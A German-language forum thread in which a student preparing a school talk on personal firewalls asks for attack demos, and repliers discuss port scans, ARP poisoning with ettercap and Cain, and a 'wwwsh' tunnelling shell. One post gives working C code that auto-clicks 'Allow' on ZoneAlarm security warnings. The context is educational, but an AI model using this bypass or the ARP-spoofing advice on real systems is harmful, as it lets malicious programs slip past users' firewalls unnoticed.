Firewall Referat - Meldung erzwingen!

Hi!

Ich habe bald ein Referat über Firewalls, worauf ich mich intensiv vorbereite :D
Video zum Referat hab ich schon , jetzt hab ich noch die Idee eines "Live Experiments" (The next uri geller *wink*)... Naja es soll eben ein live versuch sein, allerdings ohne erfolg. Ich will also nicht unbedingt in ein System (wir haben mehrere laptops, hätt einen Angreifer (mein pc) und ein Opfer (pc des mit-referenten)).
eindringen, sondern Nur verschiedene Fehlermeldungen von einer Firewall (wir präsentieren ZoneAlarm und Sygate Personal Firewall) hervorrufen.

Dazu wollen wir eben verschiedene Attacken (portscan usw) vom Angreif pc an den Opfer Pc durchführen.

Könnt ihr mir Methoden / vll sogar tools geben, mti denen wir das erreichen?

Mfg

Huggy =)
 
Ich weiß nicht mehr obs bei ZoneAlarm war oder bei einem anderen, aber ich glaub das die Angriffe in einer History eingetragen wurden. Vielleicht könntet ihr die zeigen.
 
Super! Sowohl pdf als auch mp4 eigenen sich echt wunderbar :D

Werd sowieso mehr auf Software als auf Hardwarefirewall eingehen, weil für Brutto Normalverbraucher ohne Router... ihr wisst ja :rolleyes:


??: Wir wollen jetzt noch ein Arp-Poisoning durchführen, um eben die Schwachstellen von Firewalls zu zeigen (hab gehört die erkennen das nicht? ).

Jetzt haben wir ind er SChule aber ein auf Switche-basierendes LAN, und ich finde weder mit ettercap noch mit Cain andere Hosts im Netzwerk :(

Gibts irgendeine Methode, dieses Projekt doch durchzuführen ? Schlimmstenfalls müsst ich von zuhause einen Hub mitbringen, da solllte es doch funktionieren? X(

ODer geht's auch in einem wie oben beschriebenen Lan? Ich mein anpingen kann ich ja alle :baby:

Mfg


??2: kk hatte vergessen, den promiscius mode auszuschalten -_-
jetzt finde ich so 5-6 hosts, in meinem testnetzwerk sind aaber 15 :/
Und sobald ich mit cain oder ettercap nach hosts scanne, ist mein ganzes Internet weg..dann muss ich rebooten X(

Und wie finde ich alle hosts?
 
Das mit dem ARP-Poisoning sollte eigentlich funktionieren. Du empfängst keine Daten vom Switch, weil dieser einfach keine Pakete an dich weiterleitet, die nicht für dich bestimmt sind. Durch das ARP-Poisoning erreichst du aber, dass das Opfer seine Pakete an DICH statt an das Ziel schickt.

Übrigens, ich hab mir mal 'nen Spaß daraus gemacht, das AutoKlick-Beispiel für ZoneAlarm umzuschreiben. Das ganze ist POC-Code (die Abfrage blinkt noch kurz auf), aber an sich funktioniert es. Das wäre vielleicht auch 'ne Demonstration wert ;).
Code:
#include <windows.h>

int main()
{
	while (1) {
		// finde das Fenster
		HWND win = FindWindowEx(0, 0, 0, "ZoneAlarm-Sicherheitswarnung");
		if (win == 0 || IsWindowVisible(win) == 0) {
			Sleep(100);
			continue;
		}

		// wähle "Zulassen" aus
		HWND button = FindWindowEx(win, NULL, NULL, "Zu&lassen");
		if (button == 0) {
			MessageBoxEx(NULL, "Kann Zulassen-Button nicht finden!", "ZAAK", MB_OK, 0);
		}


		HWND prevForegroundWindow = GetForegroundWindow();
		SetForegroundWindow(button);
		SendMessage(button, WM_SETFOCUS, 0, 0); 
		keybd_event(VK_SPACE, 0, 0, 0);
		keybd_event(VK_SPACE, 0, KEYEVENTF_KEYUP, 0);
		SetForegroundWindow(prevForegroundWindow);
	}
	return 0;
}
 
Ich wuerde an deiner Stelle den Vortag nicht darauf hinauslaufen lassen, dass das Publikum sich am Ende mit PersonalFirewalls sicherer fuehlt. Vielmehr solltest du ihnen beibringen, dass es vor irgendwelches SK schuetzt, aber wenn es jemand wirklich drauf anlegt, ist auch eine pfw kein Hinderniss: https://www.rootkit.com/newsread.php?newsid=849
 
Werd sowieso mehr auf Software als auf Hardwarefirewall eingehen, weil für Brutto Normalverbraucher ohne Router... ihr wisst ja

Aber bevor du so vor deiner Klasse argumentierst. Es GIBT keine Hardware Firewalls.
Das sind nichts anderes als kleine "PCs" auf denen ein Betriebssystem mit Packetfilter
läuft. Hardware Firewalls sind ein Hirngespinst von IT Marketingprofis ;)

Nenn sie dann lieber "dedizierte" Firewall Rechner/Computer.

Prinzipiell gibt es keinen Unterschied zwischen einer Netgear Firewall mit IPFilter
und einem Windows 2003 Server mit seiner Firewall.

Zumindest kannst Du mit einer solchen Darstellung noch ein paar "A-ha" Effekte kassieren ;)
 
ja, dass hat sich halt so eingebürgert :/
Blödes marketing :P


Danke, für das Zonealarm script, sicher auch hilfreich!
Für den "echten" Bösewicht wäre "immer zulassen" oder "Nicht mehr nachfragen" auch praktisch :D ob man das so zeigen kann weiß ich net, ich glaub ich zeigs einmal so & dreh zuhaus n video davon dass ich dann @zeitlupe abstell.

Der Ziel des Vortrags ist ja, dass man PFW skeptisch gegenüber steht :-)

Noch wer eine Idee, warum ich keine Netzwerkverbindung / IP mehr zugewiesen bekomme sobald ich mit CAIN / Ettercap nach Hosts scanne? (Beide finden aber nur 5-7, im netzwerk sind aber 15+)...

Danke euch =) so jetzt schau ich mal dass ich das script compiled bekomm, hab ja garkeinen c Compiler mehr :P
 
Wer skeptisch ist vertraut nicht blind *Hoffnungslos zu argumentieren versuch*

Hat irgendwer eine Idee warum ich @ Arp-Spoofing nicht alle hosts finde & Netzwerkverbindung verliere? Sowohl zuhause im WLAN als auch @ testnetzwerk 8o

??: habe probleme beim compilen des wwwsh clienten, den ich gerne ausführen würde..
Kann mir vll. wer den clienten (Server läuft :) ) compilen?


http://blog.copton.net/articles/pfw-versagen/wwwsh.tar.bz2

Hab noch nie mit c(#/++) gearbeitet und wenn ich wie nach anleitung beschrieben den Compiler auf die MAKE file hetze, sagt er "MAKE Ok, nothing to do?" und beendet sich..aber keine .exe :/ hab schon 2 compiler probiert, keiner war das gelbe vom Ei 8o
 
Zurück
Oben